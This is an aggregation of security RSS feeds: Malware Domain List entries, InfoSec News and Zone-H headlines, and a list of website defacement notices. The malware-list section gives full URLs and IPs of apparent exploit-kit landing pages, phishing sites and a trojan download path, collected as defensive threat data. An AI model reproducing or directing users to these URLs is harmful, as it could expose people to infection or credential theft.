http://www.malwaredomainlist.com/hostslist/mdl.xml Host: bakface.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> security-safety-account.de.vc (2012/10/16_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: security-safety-account.de.vc/, IP address: 188.40.70.27, ASN: 24940, Country: DE, Description: iframe leads to Facebook phishing

==> restorehelprecovery.indonesian-hacker.net (2012/10/16_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: restorehelprecovery.indonesian-hacker.net/, IP address: 31.170.166.61, ASN: 47583, Country: US, Description: Facebook phishing

==> 2.bajawinery.com (2012/10/16_19:39)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: 2.bajawinery.com/links/odds-component.php, IP address: 174.140.165.227, ASN: 46816, Country: US, Description: Blackhole exploit kit 2.0

==> 107.6.97.250 (2012/10/16_19:39)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 107.6.97.250/links/around_film.php, ASN: 29791, Country: US, Description: Blackhole exploit kit 2.0

==> n36.3a4.nl (2012/10/15_12:25)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: n36.3a4.nl/bleep/unless-operators-overall.php, IP address: 46.105.53.69, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0

==> 92.243.25.255 (2012/10/15_12:25)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 92.243.25.255/links/official-corners_likes.php, ASN: 29169, Country: FR, Description: Blackhole exploit kit 2.0

==> 149.47.134.194 (2012/10/15_12:25)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 149.47.134.194/Web/links/replacement-based_destroy-varies.php, ASN: 36444, Country: US, Description: Blackhole exploit kit 2.0

==> maisons-une.co.cc (2012/10/15_12:33)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: maisons-une.co.cc/, IP address: 91.234.32.170, ASN: 56485, Country: UA, Description: Bleeding Life exploit kit

==> maisons-une.co.cc (2012/10/15_12:33)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: maisons-une.co.cc/download_file.php?e=JavaSignedApplet, IP address: 91.234.32.170, ASN: 56485, Country: UA, Description: trojan

==> linkrdin.ru:8080 (2012/10/15_16:53)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: linkrdin.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> 94.23.43.55 (2012/10/15_16:55)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 94.23.43.55/links/around_film.php, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0 / payload Sinowal

==> navisiteseparation.net (2012/10/15_16:55)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: navisiteseparation.net/detects/processing-details_requested.php, IP address: 183.81.133.121, ASN: 38442, Country: FJ, Description: Blackhole exploit kit 2.0 / payload Cridex

==> wikipediastore.ru:8080 (2012/10/15_17:00)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: wikipediastore.ru:8080/forum/links/public_version.php, IP address: 79.98.27.9, ASN: 47205, Country: LT, Description: Blackhole exploit kit 2.0

==> o.anygutterking.com (2012/10/15_18:10)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: o.anygutterking.com/links/assure_numb_engineers.php, IP address: 198.136.53.38, ASN: 33182, Country: US, Description: Blackhole exploit kit 2.0

==> 173.246.101.197 (2012/10/12_16:11)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 173.246.101.197/links/rules_familiar-occurred.php, ASN: 29169, Country: US, Description: Blackhole exploit kit 2.0

==> geforceexlusive.ru:8080 (2012/10/12_16:48)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: geforceexlusive.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !

http://www.infosecnews.org/isn.rss InfoSec News: Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !: Forwarded from: noreply (at) crypto.cs.stonybrook.edu 2011 ACM Cloud Computing Security Workshop (CCSW) at CCS October 21, 2011, SWISSOTEL Chicago http://crypto.cs.stonybrook.edu/ccsw11 Dear Colleagues, CCSW is back! The past workshops were a tremendous success, with over [...]

==> Unfollowed: How a (Possible) Social Network Spy Came Undone

http://www.infosecnews.org/isn.rss InfoSec News: Unfollowed: How a (Possible) Social Network Spy Came Undone: http://www.wired.com/dangerroom/2011/04/unfollowed-how-a-possible-social-network-spy-came-undone/ [When the early information about this story was coming out, it was that @PrimorisEra might have been spotting and assessing targets for a KGB honey pot operation. [...]

==> US-Russian dictionary defines cyber war, other concepts

http://www.infosecnews.org/isn.rss InfoSec News: US-Russian dictionary defines cyber war, other concepts: http://gcn.com/articles/2011/04/28/us-russia-cyber-dictionary.aspx By William Jackson GCN.com April 28, 2011 It is all very well to talk about cyberspace and cybersecurity, but what do they mean, exactly? A U.S.-Russian effort is proposing common definitions. [...]

==> ICANN taps DefCon founder for top security spot

http://www.infosecnews.org/isn.rss InfoSec News: ICANN taps DefCon founder for top security spot: http://www.v3.co.uk/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot By Shaun Nichols V3.co.uk 29 Apr 2011 The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security. The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC. [...]

==> Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools

http://www.infosecnews.org/isn.rss InfoSec News: Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools: http://www.kirotv.com/education/27708043/detail.html By kirotv.com Webstaff April 28, 2011 SEATTLE -- Someone has stolen teacher passwords and changed grades in a Seattle Public Schools computer system, the district said in an email to teachers obtained Thursday by KIRO 7 Eyewitness News. [...]

==> Cyberespionage: US finds FBI agents in elite unit lack necessary skills

http://www.infosecnews.org/isn.rss InfoSec News: Cyberespionage: US finds FBI agents in elite unit lack necessary skills: Forwarded from: Justin Lundy <jbl (at) tegataiphoenix.com> http://www.csmonitor.com/USA/2011/0427/Cyberespionage-US-finds-FBI-agents-in-elite-unit-lack-necessary-skills By Mark Clayton Staff writer The Christian Science Monitor April 27, 2011 Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone -- a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions -- those by a foreign power for intelligence gathering or terrorist purposes. But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, "reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases." Five of the agents told investigators "they did not think they were able or qualified" to investigate such cases, the report said. The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI’s cyber unit. [...]

==> Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College

http://www.infosecnews.org/isn.rss InfoSec News: Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College: http://www.herald-mail.com/news/local/hm-cyber-experts-dissect-hacker-attacks-during-cybersecurity-forum-at-hagerstown-community-college-20110427,0,2996601.story By ANDREW SCHOTZ herald-mail.com April 27, 2011 Experts Wednesday detailed simple and complex ways to protect computers [...]

==> Are we talking "cyber war" like the Bush admin talked WMDs?

http://www.infosecnews.org/isn.rss InfoSec News: Are we talking "cyber war" like the Bush admin talked WMDs?: http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars By Matthew Lasar Ars Technica April 27, 2011 Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. [...]

==> Oracle hedging its vulnerability reports?

http://www.infosecnews.org/isn.rss InfoSec News: Oracle hedging its vulnerability reports?: http://www.computerworld.com/s/article/9216213/Oracle_hedging_its_vulnerability_reports_ By Joab Jackson IDG News Service April 27, 2011 Oracle may be subtly misleading customers about the severity of some of the vulnerabilities found in its database software, according to [...]

==> PlayStation credit card data was encrypted

http://www.infosecnews.org/isn.rss InfoSec News: PlayStation credit card data was encrypted: http://www.zdnet.com.au/playstation-credit-card-data-was-encrypted-339314012.htm By Darren Pauli ZDNet.com.au April 28th, 2011 Sony has confirmed that the credit card details possibly stolen in a breach of its PlayStation Network (PSN) were encrypted. [...]

==> Phone-hacking laws are 'very uneven and unclear'

http://www.infosecnews.org/isn.rss InfoSec News: Phone-hacking laws are 'very uneven and unclear': http://www.guardian.co.uk/media/2011/apr/26/phone-hacking-laws-christopher-graham By James Robinson guardian.co.uk 26 April 2011 The information commissioner has told a powerful group of MPs that legislation outlawing phone hacking is "very uneven" and "very unclear" [...]

==> USENIX WOOT '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: USENIX WOOT '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 5th USENIX Workshop on Offensive Technologies (WOOT '11) is approaching. Please submit all work by May 2, 2011, at 11:59 p.m. PDT. [...]

==> USENIX HotSec '11 Submission Deadline Extended

http://www.infosecnews.org/isn.rss InfoSec News: USENIX HotSec '11 Submission Deadline Extended: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 6th USENIX Workshop on Hot Topics in Security has been extended. Please submit all work by 11:59 p.m. EST on May 12, 2011. HotSec takes a broad view of security and privacy and encompasses research on new security ideas and problems. Cross-discipline papers identifying new security problems or exploring approaches not previously applied to security will be given special consideration. All submissions should propose new directions of research, advocate non-traditional approaches, report on noteworthy experience in an emerging area, or generate lively discussion around an important topic. Topics of interest include, but are not limited to the following: * Large-scale threats * Network security * Hardware security * Software security * Physical security * Programming languages * Applied cryptography * Privacy * Human-computer interaction * Emerging computing environment * Sociology * Economics Attendance will be limited to 35-50 participants, with preference given to the authors of accepted position papers/presentations. Submission guidelines and more information can be found at http://www.usenix.org/hotsec11/cfpb HotSec '11 will take place Tuesday, August 9, 2011, in San Francisco, CA. It is co-located with the 20th USENIX Security Symposium, which will take place August 10-12, 2011. We look forward to your submissions. Patrick McDaniel, Pennsylvania State University HotSec '11 Program Chair hotsec11chair (at) usenix.org

==> Court order cripples Coreflood botnet, says FBI

http://www.infosecnews.org/isn.rss InfoSec News: Court order cripples Coreflood botnet, says FBI: http://www.computerworld.com/s/article/9216190/Court_order_cripples_Coreflood_botnet_says_FBI By Gregg Keizer Computerworld April 26, 2011 Although the Federal Bureau of Investigation (FBI) said a federal temporary restraining order has crippled the Coreflood botnet in the U.S. [...]

==> China Implicated In Hacking Of SMB Online Bank Accounts

http://www.infosecnews.org/isn.rss InfoSec News: China Implicated In Hacking Of SMB Online Bank Accounts: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229402294/china-implicated-in-hacking-of-smb-online-bank-accounts.html By Kelly Jackson Higgins Darkreading April 26, 2011 This time it wasn't an "advanced persistent threat" associated with [...]

==> Is Iran just seeing Stars?

http://www.infosecnews.org/isn.rss InfoSec News: Is Iran just seeing Stars?: http://www.csoonline.com/article/680599/is-iran-just-seeing-stars- By Robert Lemos CSO April 26, 2011 An Iranian official caused a stir Monday, claiming the nation's cybersecurity experts found another digital attack aimed at the Islamic country's systems. [...]

==> Police: Wireless network hacker targeted Seattle-area businesses

http://www.infosecnews.org/isn.rss InfoSec News: Police: Wireless network hacker targeted Seattle-area businesses: http://www.seattlepi.com/local/article/Police-Wireless-network-hacker-targeted-1344185.php By LEVI PULKKINEN SEATTLEPI.COM STAFF April 19, 2011 Law officers have moved to seize a Seattle man's car they claim was used in a "wardriving" spree that saw Seattle-area wireless networks hacked [...]

==> New Workshop: USENIX FOCI '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: New Workshop: USENIX FOCI '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> We're writing to remind you that the submission deadline for the first USENIX Workshop on Free and Open Communications on the Internet (FOCI '11) is approaching. Please submit your work by May 1, 2011, at 11:59 p.m. PDT. http://www.usenix. [...]

==> The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures

http://www.infosecnews.org/isn.rss InfoSec News: The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures: http://www.eweekeurope.co.uk/comment/the-rising-tide-of-cyber-threats-could-engulf-national-infrastructures-27457 By Eric Doyle eWEEK Europe April 25, 2011 Cyber-attacks are increasing but national infrastructures are ill-prepared to defend themselves. [...]

==> DHS chief: What we learned from Stuxnet

http://www.infosecnews.org/isn.rss InfoSec News: DHS chief: What we learned from Stuxnet: http://www.computerworld.com/s/article/9216166/DHS_chief_What_we_learned_from_Stuxnet By Robert McMillan IDG News Service April 25, 2011 If there's a lesson to be learned from last year's Stuxnet worm, it's that the private sector needs to be able to respond quickly to [...]

==> Dataloss Weekly Week of Sunday, April 17, 2011

http://www.infosecnews.org/isn.rss InfoSec News: Dataloss Weekly Week of Sunday, April 17, 2011:
Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, April 17, 2011 45 Incidents Added.
[...]

==> Phishing: Consumer Education Lacking

http://www.infosecnews.org/isn.rss InfoSec News: Phishing: Consumer Education Lacking: http://www.bankinfosecurity.com/articles.php?art_id=3571 By Tracy Kitten Managing Editor Bank Info Security April 22, 2011 The Oak Ridge National Laboratory, located in Tennessee, recently disconnected Internet access after hackers attacked employees at the federal facility. [...]

==> 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems

http://www.infosecnews.org/isn.rss InfoSec News: 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems: Forwarded from: Marius Minea <marius (at) cs.upt.ro> CALL FOR PAPERS [ PDF version at: http://crisis2011.cs.upt.ro/CRiSIS2011-CfP.pdf ] The Sixth International Conference on Risks and Security of Internet and Systems CRiSIS 2011 Timisoara, Romania, 26-28 September 2011 [...]

==> Phishing Attack Hits Oak Ridge National Laboratory

http://www.infosecnews.org/isn.rss InfoSec News: Phishing Attack Hits Oak Ridge National Laboratory: http://www.informationweek.com/news/government/security/229402048 By Elizabeth Montalbano InformationWeek April 21, 2011 The Department of Energy's Oak Ridge National Laboratory is investigating a sophisticated phishing attack that forced it to shut down email and Internet access last week. [...]

==> Hacker diagnosed with brain cancer, hacks the closed source report distributing it to the open source community hoping to get some help

http://www.zone-h.org/rss/news This is a somewhat astonishing news, and once again the demonstration that alternative thinking might be the way to solve apparently unsolvable cases. I just report what was written by the hacker himself on his website. Can anyone help? &nbsp; Rome, September 10th 2012 I have a brain cancer. Yesterday I went to get my digital medical records: I have to show them to many doctors. Sadly they were in a closed, proprietary format and, thus, I could not open them using my computer, or send them in this format to all the people who could have saved my life.

==> Zone-H celebrates its 10 years!

http://www.zone-h.org/rss/news 10 years ago Zone-H opened, a little website with security news and a &quot;cybercrime archive&quot; which quickly became success story. The goals of Zone-H were to follow security trends and analyze the growing importance of hacktivism.

==> Turkish hacking group defaces UPS, TheRegister, Acer, Telegraph, Vodafone

http://www.zone-h.org/rss/news At the time of writing these websites are still defaced, with a black page written &quot;TurkguvenLigi&quot; and &quot;4 Sept. &nbsp;We TurkGuvenligi declare this day as &nbsp; World Hackers Day &nbsp;- Have fun &nbsp;;) h4ck y0u&quot;. &nbsp; &nbsp; What do ups.com, vodafone.com, theregister.co.uk, acer.com, betfair.com, nationalgeographic.com and telegraph.co.uk have in common? They all use NetNames as their registrar.

==> Zone-H banned by some Indian ISPs: some workarounds

http://www.zone-h.org/rss/news As some of you probably know, Zone-H has been banned from some indian ISPs following the E2-labs scandals and a lawsuit from E2labs and Zaki Qureshey in an indian court, who claimed our documents and articles were defamatory (great joke!). Zone-H was unable to defend itself as we didn&#39;t receive any notification from the court. What is even funnier (scarier?), is that bloggernews.net has also been banned...

==> New attack vector in DDoS observed

http://www.zone-h.org/rss/news &nbsp; This article is a result of the common research of Jakub Alimov from the Seznam.cz and minor from Zone-h.org. If you have anything to say about this, write to comments [a} zone-h{dot]org. The topic was presented at the SPI conference in Brno/CZ. While protecting the users from receiving a huge amount of the unsolicited bulk mail, a new attacking scenario against the DNS servers was observed. The scenario involves sending the spam messages to the SMTP services with a big bandwidth.

==> The old "new" Japanese scams

http://www.zone-h.org/rss/news Dear friends, in these days we all turned our minds to Japan, to the Japanese people, some of them are our friends, or some of our friends live in Japan. We would like to express the condolences to the families which lost their family members. We are deeply concerned about the injuries and losses caused by the earthquake set, tsunami flooding and the nuclear catastrophe. Nevertheless, we have to express also our anger. We already recorded first set of the scam emails asking the unaware users to donate for the charity, but as usual the money will never come to the victims.

==> Defacements Statistics 2010: Almost 1,5 million websites defaced, what's happening?

http://www.zone-h.org/rss/news Last year the Zone-H archived a sad record number, we archived 1.419.203 websites defacements. Why and how this is happening? If you are looking at on the stats, the things remain the same: file inclusion, sql injection, webdav attacks and shares misconfiguration are still at the top ranks of the attack methods used by the defacers to gain first access into the server. As an important factor influencing the stats we consider the fact that last year brought a very high number of the local linux kernel exploits.

==> Notes on the Wikileaks case

http://www.zone-h.org/rss/news First of all, we would like to emphasize that Zone-H is not related to any party in the Wikileaks case. We are do not agree nor disagree with any action happened, we just want to share our opinion on the forthcomming events. Already many news media released information about the cables, sources, how it happened etc. But now, it is clear that the Wikileaks will not stop to publish the cables. There are plenty of the mirrors all around the globe and information are shared over the Facebook and Twitter. Also the arrest of Julian Assange can&#39;t stop the day-by-day publishing of the cables.

==> Defacements Statistics 2008 - 2009 - 2010*

http://www.zone-h.org/rss/news When Zone-H started back in 2002, we were receiving an average of 2500 defacements monthly, this number keeps on increasing year after year. For example, the last month we registered over 95.000 defacements, while we only had 60.000 in 2009 for the same period. What we can also say from these numbers is that the methods used are still the same: most of the vulnerabilities exploited are on web applications. We also know from what we monitored that registrar attacks greatly increased the past years even if this number is quite low compared to the total of attacks.

==> Twitter and Baidu hijacked by "Iranian Cyber Army"

http://www.zone-h.org/rss/news You probably read that story somewhere last month, on December 17 2009 Twitter's homepage has been replaced by this message: &quot;Iranian Cyber Army THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY iRANiAN.CYBER.ARMY@GMAIL.COM U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don&rsquo;t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To&hellip;. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA? WE PUSH THEM IN EMBARGO LIST ;) Take Care.

==> http://yoursmarthome.com.au

http://www.zone-h.org/rss/defacements http://yoursmarthome.com.au notified by Hmei7

==> http://www.wefixcredit.com.au

http://www.zone-h.org/rss/defacements http://www.wefixcredit.com.au notified by Hmei7

==> http://www.wefixcredit.co.nz

http://www.zone-h.org/rss/defacements http://www.wefixcredit.co.nz notified by Hmei7

==> http://www.vaulthotel.com.au

http://www.zone-h.org/rss/defacements http://www.vaulthotel.com.au notified by Hmei7

==> http://www.vantagecontrols.com.au

http://www.zone-h.org/rss/defacements http://www.vantagecontrols.com.au notified by Hmei7

==> http://www.travelaccess.com.au

http://www.zone-h.org/rss/defacements http://www.travelaccess.com.au notified by Hmei7

==> http://thereferralmaster.com

http://www.zone-h.org/rss/defacements http://thereferralmaster.com notified by Hmei7

==> http://www.sydneymobilemassage.com

http://www.zone-h.org/rss/defacements http://www.sydneymobilemassage.com notified by Hmei7

==> http://www.spartanleather.com.au

http://www.zone-h.org/rss/defacements http://www.spartanleather.com.au notified by Hmei7

==> http://pinnacleentertainment.com.au

http://www.zone-h.org/rss/defacements http://pinnacleentertainment.com.au notified by Hmei7

==> http://plotterrepairsservice.com.au

http://www.zone-h.org/rss/defacements http://plotterrepairsservice.com.au notified by Hmei7

==> http://www.perfectpeptides.com.au

http://www.zone-h.org/rss/defacements http://www.perfectpeptides.com.au notified by Hmei7

==> http://www.photocopierrepairsservice.com.au

http://www.zone-h.org/rss/defacements http://www.photocopierrepairsservice.com.au notified by Hmei7

==> http://www.drnikkig.com.au

http://www.zone-h.org/rss/defacements http://www.drnikkig.com.au notified by Hmei7

==> http://www.landscapeconstructionanddesign.com

http://www.zone-h.org/rss/defacements http://www.landscapeconstructionanddesign.com notified by Dr.SHA6H

==> http://smithwaysecurity.com

http://www.zone-h.org/rss/defacements http://smithwaysecurity.com notified by Dr.SHA6H

==> http://www.financialdoctor.com

http://www.zone-h.org/rss/defacements http://www.financialdoctor.com notified by Dr.SHA6H

==> http://myscot.org

http://www.zone-h.org/rss/defacements http://myscot.org notified by Dr.SHA6H

==> http://qberty.com

http://www.zone-h.org/rss/defacements http://qberty.com notified by Dr.SHA6H

==> http://www.mvafinance.com

http://www.zone-h.org/rss/defacements http://www.mvafinance.com notified by Hmei7